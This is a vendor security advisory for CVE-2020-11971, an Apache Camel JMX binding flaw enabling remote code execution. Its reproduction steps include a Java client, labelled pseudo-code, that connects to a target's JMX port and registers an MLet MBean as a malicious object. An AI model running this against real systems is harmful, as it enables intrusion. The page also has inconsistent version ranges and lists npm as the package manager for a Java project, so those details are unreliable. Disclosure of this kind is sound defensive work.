By clicking "Accept", you agree to the storing of cookies on your device to enhance site navigation, analyze site usage, and assist in our marketing efforts. View our Privacy Policy for more information.

PreferencesRejectAccept
Manage Consent Preferences by Category
Essentials
Always active

Necessary for the site to function. Always On.

Used for targeted advertising.

Remembers your preferences and provides enhanced features.

Measures usage and improves your experience.

Reject AllAccept All
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
View all Vulnerabilities

CVE-2020-11971

Remote Code Execution
Affects
Apache Camel
>=3.0.0 <=3.1.0 2.25.0 2.24.x 2.23.x 2.22.x
in
Apache Camel
No items found.
Exclamation circle icon
Patch Available

This Vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs

View NES Solution

‍Overview

Apache Camel is an open-source integration framework that simplifies the connection of disparate systems by providing a rule-based routing and mediation engine, supporting over 300 components for protocols, data formats, and APIs. It enables developers to define integration patterns using an expressive domain-specific language, facilitating tasks like message transformation, routing, and enterprise application integration with minimal coding.

Apache Camel’s JMX integration isn’t properly securing the binding process.Typically, an object caller can trust that it will receive the correct remote object. However, with this insecure communication, a malicious actor can replace the correct remote object with its own.

Remote code execution flaws are among the Top 10 Open Web Application Security Project (OWASP) vulnerabilities. They are among the most potentially damaging of vulnerabilities because injected, remotely executed code:

  • can access internal application objects/methods
  • can often bypass security controls
  • may persist across sessions
  • can often pivot to gain OS-level access.

Module Info

Product: Apache Camel

Affected packages: Apache Camel

Affected versions:

>=3.0.0 <3.1.0
2.25.0
2.24.x
2.23.x
2.22.x

GitHub Report: https://github.com/apache/camel/pull/3692

Published packages: N/A

Package manager: npm

Vulnerability Info

This critical-severity vulnerability is found in the main package of Apache Camel. Note that additional versions may be vulnerable and all users are encouraged to upgrade a secure version.

Steps To Reproduce

  1. Set up an Apache Camel environment using a vulnerable version, such as version 3.1.0 or earlier.
  2. Configure Camel to use JMX, which is often enabled by default for monitoring and management. This can be done by ensuring the camel-management component is included and JMX is not disabled in the configuration (e.g., via camel.springboot.jmx-enabled=true in Spring Boot applications).
  3. The JMX port (default 1099) is accessible, either locally or over a network.
  4. Create a simple Camel application:

  1. For MyRouteBuilder(), for this example use a timer:
import org.apache.camel.builder.RouteBuilder;

public class MyRouteBuilder extends RouteBuilder {
    @Override
    public void configure() throws Exception {
        // Define a route that triggers every 5 seconds and logs a message
        from("timer:simpleTimer?period=5000") // Fires every 5 seconds
            .setBody(constant("Hello from Camel!")) // Sets a static message
            .to("log:MyRouteBuilder?level=INFO"); // Logs it to the console
    }
}

  1. Start the app and Ensure that port 1099 is exposed (test with telnet <your-ip> 1099).
  2. Craft a malicious JMX client along the lines of this pseudo-code:
import javax.management.remote.*;
import javax.management.*;

public class JMXExploit {
    public static void main(String[] args) throws Exception {
        String url = "service:jmx:rmi:///jndi/rmi://<target-ip>:1099/jmxrmi";
        JMXServiceURL serviceURL = new JMXServiceURL(url);
        JMXConnector connector = JMXConnectorFactory.connect(serviceURL);
        MBeanServerConnection mbsc = connector.getMBeanServerConnection();

        // Attempt to rebind a malicious object
        ObjectName name = new ObjectName("camel:type=context,name=\"camel-1\"");
        mbsc.createMBean("javax.management.loading.MLet", name); // Example malicious class
    }
}

  1. The rebind flaw allows an attacker to register a malicious MBean (e.g., one that loads remote code via a URLClassLoader or similar gadget). In a real exploit, this would involve a payload that triggers RCE when the server interacts with it.
  2. Run the app:
java -cp . JMXExploit

      10. Observe the result. If successful, the Camel instance would execute the attacker’s code when it processes the rebound MBean. This could be as simple as a             System.out.println for testing or a more dangerous payload in a real attack.

Addressing the Issue

Users of the affected components should apply one of the following mitigations:

  • Upgrade to a secure version of the software.
  • Sign up for post-EOL security support; HeroDevs customers get immediate access to a patched version of this software.

Credit(s)

  • Colm O. Heigeartaigh, Apache Software Foundation
  • Jonathan Gallimore, Tomitribe

Pink arrow
Pink arrow
CVE-2020-11971
What is a HeroDevs Security Advisory?
Vulnerability Details
ID
CVE-2020-11971
PROJECT Affected
Apache Camel
Versions Affected
>=3.0.0 <=3.1.0 2.25.0 2.24.x 2.23.x 2.22.x
Published date
≈ Fix date
May 14, 2020
Fixed in
Apache Camel NES
Severity
Critical
Category
Remote Code Execution
Sign up for the latest vulnerability alerts fixed in
Apache Camel NES
Rss feed icon
Subscribe via RSS
or
Thanks for signing up for our Newsletter! We look forward to connecting with you.
Oops! Something went wrong while submitting the form.